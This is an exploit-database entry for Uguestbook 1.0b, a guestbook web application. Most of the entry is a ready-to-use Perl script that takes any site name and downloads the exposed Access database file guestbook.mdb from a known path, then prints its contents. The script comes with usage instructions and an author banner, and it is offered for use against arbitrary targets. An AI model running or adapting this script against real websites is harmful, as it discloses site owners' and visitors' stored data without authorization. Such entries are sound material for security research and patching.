Uguestbook 1.0b (guestbook.mdb) Arbitrary Database Disclosure Exploit

2009-05-04T00:00:00
ID 1337DAY-ID-5135
Type zdt
Reporter Cyber-Zone
Modified 2009-05-04T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
Uguestbook 1.0b (guestbook.mdb) Arbitrary Database Disclosure Exploit
=====================================================================


#!/usr/bin/perl
#
#
# Uguestbook 1.0
# mdb-database/guestbook.mdb
#
#
#
#
#
#
#
use LWP::Simple;
use LWP::UserAgent;

print "\tUguestbook 1.0 Arbitrary Database Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";
print "\t*               From : MoroccO Figuig/Oujda City               *\n";
print "\t****************************************************************\n\n\n\n";
if(@ARGV < 1)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 site \n";
print "[X] Exemple : perl $0 www.site.com \n";
}
($site) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);
$database = "mdb-database/guestbook.mdb";
my $exploit = "http://" . $site . "/" . $database;
print("Searching For file ...\n\n");
sleep(3);
$doexploit=get $exploit;
if($doexploit){
print("..........................File Contents...........................\n");
print("$doexploit\n");
print("..............................EOF.................................\n");
}
else {
help();
exit;
}



#  0day.today [2018-03-14]  #